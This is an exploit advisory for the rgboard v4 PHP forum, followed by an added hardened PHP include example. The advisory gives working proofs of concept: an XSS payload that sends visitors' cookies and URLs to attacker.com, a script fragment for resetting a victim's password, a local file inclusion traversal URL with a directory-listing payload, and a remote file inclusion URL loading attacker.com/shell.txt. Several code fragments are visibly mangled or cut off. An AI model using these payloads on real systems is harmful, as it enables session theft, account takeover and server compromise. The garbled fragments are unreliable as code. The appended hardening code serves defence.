
rgboard v4 (07.07.27) Multiple Vulnerability






/***************************
XSS Vulnerability

/wrtie.php

..

$bd_content = rg_conv_text($bd_content,$bd_html); //You have to check 'html use'.

*************************/

poc:

Inject XSS tag : 
"http://attacker.com" Hi">onError="window.location='http://attacker.com/c.php?c='+document.cookie+'&l='+window.location">Hi there! :) 

/rghunter.php - Makes password as 12345

eregi_replace("http://","",$l); 

  $chk = 0;

  for($i = 0; $i < strlen($url); $i++)
  {
	if($url[$i] == '/')
        {
		$chk = $i;
	}
  }
  for($i = $chk; $i < strlen($url); $i++)
  {
  	$url[$i] = "";
  }

  $url = $url."/../rg4_member/modify.php";
  setcookie($c);
?>

"http:// ?>?" method = "post" name = "member_info"> value="attacker@attack.com">
/***************************
Local File Inclusion Vulnerability

/_footer.php

if(file_exists($skin_path."footer.php")) include($skin_path."footer.php"); //File inclusion

*************************/

poc:

//Yeah, there is a problem.. file_exists()!
//How can we bypass it? I don't know :)
//If we have an account on the same server as the target, we can attack his board easily
//Here is the example :

http://attacker.com/RGboard/rg4_board/_footer.php?skin_path=../../../../../../tmp/

/tmp/footer.php

handle . "\n";
echo "Path: " . $d->path . "\n";
while (false !== ($entry = $d->read())) {
    echo $entry."\n";
}
$d->close();
?>

//Yeah, it is good. But when we don't have an account on that server, how can we beat the target?
//We can find a clue from php.net

//On windows, use //computername/share/filename or \\computername\share\filename to check files on network shares.
//As of PHP 5.0.0, this function can also be used with some URL wrappers. Refer to List of Supported Protocols/Wrappers
//for a listing of which wrappers support stat() family of functionality.

//Did you find the clue too? :-O

/***************************
Remote File Inclusion Vulnerability

/footer.php

..

include($_path['counter']."rg_counter.php"); ?> //File inclusion

*************************/

poc:

http://test.com/RGboard/include/footer.php?_path[counter]=http://attacker.com/shell.txt?
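
A hardened form of the two include() calls above, as an added example that is not part of the original advisory or of rgboard's code: the skin is treated as a name checked against an allowlist, and the resolved path must stay inside a fixed root, instead of relying on file_exists(). The function name, root directory and name pattern are assumptions made for this illustration.

```php
<?php
// Added example, not rgboard code. safe_skin_file(), the root directory and
// the skin-name pattern are hypothetical choices made for this illustration.

/**
 * Resolve "<root>/<skin>/<file>" to a canonical path inside <root>, or null.
 * The skin is a name, never a path, so request data cannot pick the directory.
 */
function safe_skin_file(string $root, string $skin, string $file): ?string
{
    // 1. Allowlist the name: no "/", "\", ".", ":" means no traversal,
    //    no UNC share and no URL wrapper can be expressed at all.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $skin)) {
        return null;
    }
    // 2. Canonicalise both sides; realpath() resolves ".." and symlinks
    //    and returns false when the target does not exist.
    $base = realpath($root);
    $real = realpath($root . '/' . $skin . '/' . $file);
    if ($base === false || $real === false) {
        return null;
    }
    // 3. Containment check on the canonical path (catches a symlinked skin).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

// Constructed demo: a throwaway skin tree under the system temp directory.
$root = sys_get_temp_dir() . '/rg_skin_demo_' . getmypid();
mkdir($root . '/default', 0700, true);
file_put_contents($root . '/default/footer.php', '<?php echo "footer ok\n";');

// Inputs: one valid name, then the shapes used in the PoCs and php.net note.
$inputs = ['default', '../../../../../../tmp/', '//computername/share/',
           'http://attacker.com/shell.txt?', ''];
foreach ($inputs as $skin) {
    $path = safe_skin_file($root, $skin, 'footer.php');
    printf("%-36s => %s\n", var_export($skin, true), $path === null ? 'rejected' : 'accepted');
    if ($path !== null) {
        include $path; // only a canonical path under $root reaches include
    }
}

unlink($root . '/default/footer.php');
rmdir($root . '/default');
rmdir($root);
```

With allow_url_include disabled in php.ini the http:// case fails on its own, but the local-path and network-share cases do not, so the name allowlist is still required.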
